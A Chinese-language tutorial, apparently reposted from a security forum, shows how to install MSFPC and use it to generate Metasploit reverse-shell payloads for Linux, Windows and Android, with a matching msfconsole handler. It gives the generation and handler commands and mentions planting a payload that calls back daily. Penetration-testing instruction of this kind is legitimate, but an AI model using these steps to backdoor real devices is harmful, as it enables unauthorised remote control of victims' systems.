如何使用MSFPC简化生成Payload的过程

shuszhao

一般来说，生成payload的默认工具是MSFvenom，这是一个独立于Metasploit的payload生成器及编码器。虽然它是一个非常强大的payload生成神器，但是对于一些新手来说，可能难以在短时间内熟悉其操作。即使在进行最初的了解之后，生成一个基本的payload也需要输入相当多的内容，而今天，我们将看到使用MSFPC更便捷地生成paylaod。
MSFPC，或者说是MSFvenom Payload生成器，其实是一个基于MSFvenom的Payload生成器，但是它旨在简化基本的有效载荷创建过程，用户使用MSFPC可以尽可能简单地创建Payload，有时甚至只需要一个参数！如果你以前使用过MSFvenom，那么可能已经自行编写了一个简单的shell脚本来自动化频繁地生成Payload。即使这样，这个工具也绝对值得一试。
第一步：安装MSFPC
首先，我们需要先行安装MSFPC，步骤会因为操作系统的差别而有所不同。
第一种：在Kali Linux上安装
如果你想要在Kali Linux上安装MSFPC，那么可能会十分简单，因为它已经包含在了Kali工具库中。如果没有，那么就使用apt安装，如下所示：
apt install msfpc 第二种：在一般的Linux上安装
对于没有这个软件包的Linux和Unix版本，只需要在终端从github进行克隆就好了：
git clone https://github.com/g0tmi1k/mpc;
cd mpc

                               
登录/注册后可看大图

一旦成功克隆，就可以将其复制到一个目录中了，对于脚本本身，可以选择/usr/bin。

                               
登录/注册后可看大图

我个人不喜欢搞乱/usr/bin，把他们放在自己的目录中方便时刻跟踪我编译的或者是从github上获取的工具，当然了，这些都取决于你自己。
为所有用户安装
为了可以放在/usr/bin中，先切换到你的mpc目录，然后使用终端改变脚本权限，如下所示：
cd /path/to/mpc //mpc的目录
sudo chown root:root msfpc.sh
sudo chmod 755 msfpc.sh
sudo cp msfpc.sh /usr/bin
这组命令意思是将脚本的所有者和组都更改为root，然后使用chmod命令将文件权限配置为755，最后，将脚本移动到/usr/bin中。

                               
登录/注册后可看大图

为特定用户安装
要安装到主目录中的pentest文件夹，你需要打开你的终端并输入以下内容开始该过程：
mkdir ~/pentest
cd /path/to/mpc
chmod 700 msfpc.sh
cp msfpc.sh ~/pentest
你可能已经有一个pentest目录。如果是这样的话，就没有必要再创建一个新的。 chmod命令将脚本的权限更改为RWX ——。然后我们将它复制到pentest目录中。

                               
登录/注册后可看大图

这还没完，因为这个目录不是我们路径的一部分，为了解决这个问题，我们需要编辑我们主目录中的.bashrc。我一直在用Vim，当然你可以使用任何喜欢的编辑器（leafpad），你需要键入以下内容：
vim ~/.bashrc
一旦你开始编辑了，使用以下命令将pentest目录添加到路径变量中：
PATH=$PATH:/path/to/my/pentest/directory
你可以省略最后的斜杠。

                               
登录/注册后可看大图

保存后，使用source和which命令：
source ~/.bashrc
which msfpc.sh

                               
登录/注册后可看大图

这样一来，MSFPC就完成安装了！
生成一个Linux Payload
现在我们已经在自己选择的系统上安装了该工具，接下来就开始生成Payload。对于我们的第一个Payload，我们将使用msfpc.sh生成一个基本的Linux反向TCP ELF Payload。
对于第一个Payload，我们只需要将一个参数传给MSFPC。
msfpc.sh linux

                               
登录/注册后可看大图

首先需要注意的是，我只告诉了MSFPC我想生成一个Linux Payload，没有任何其他的信息，所以MSFPC不知道我们想连接的地址，所以它提供了选项。WAN是我的外部IP，lo是本地的，ens33是我的网络接口。
我选择了2（ens33），如果你记不住你的地址，那么这种方式就可以节省你很多时间。CMD那里显示的输出是生成该Payload而执行的完整MSFvenom命令，相当详细，而且你也可以进行核对。
一旦生成了Payload，就可以设置一个Metasploit handler来测试一下了，但是我也不必手动配置这个handler，因为Msfpc.sh会创建一个名字类似于Payload的文件，拓展名为rc。为了启动这个handler，我只需要将文件放到Metasploit中。
sudo msfconsole -q -r '/home/barrow/linux-shell-staged-reverse-tcp-443-elf.rc'
此命令中sudo的原因是因为我只是试图绑定到端口443的普通用户。-q参数告诉msfconsole跳过启动画面，-r告诉msfconsole加载文件。完成后，一旦执行有效载荷，就会回连给我一个反向shell。

                               
登录/注册后可看大图

生成一个Windwos Payload
对于Windows，我想创建多种不同的Payload。Msfpc.sh允许批量创建Payload，这意味着我可以为特定目标创建所有Payload，以下是命令：
msfpc.sh windows batch ens33
在这个命令中，我告诉msfpc.sh使用我的IP创建所有Payload，在生成过程中，可能会出现一些错误，但是最终还是会有一批Windows Payload文件。

                               
登录/注册后可看大图

生成安卓Payload
我们已经完成了Windows和Linux部分。接下来使用msfpc.sh为Android设备生成一个Payload。对于这个例子，我将生成一个Android反向TCP HTTPS MeterpreterPayload。可以用下面的命令：
msfpc.sh apk HTTPS ens33
该命令将为Android创建一个反向TCP有效载荷，并使用我IP地址通过HTTPS进行通信。

                               
登录/注册后可看大图

总结
当谈到快速创建基本的Payload时，Msfpc.sh是真的不错。这个脚本的主要缺点是它只能用于生成基本的Payload。而无法生成任何经过编码的，可绕过防病毒的Payload，但这取决于你的目标。很多时候，你只需要快速创建一个Payload，把它放在某个地方，然后每天给它“打电话”。在这种情况下，msfpc.sh真的很棒。
在整篇文章中，我主要介绍了涉及了msfpc.sh的各种选项。但还有很多其他选项可用，你可以使用–help verbose，这样一来，脚本会为你提供完整的帮助文件。帮助文件非常之详细，且易于阅读。
WinPayloads：一款可生成难以被检测到的payload之神奇工具

追梦

          

天涯哥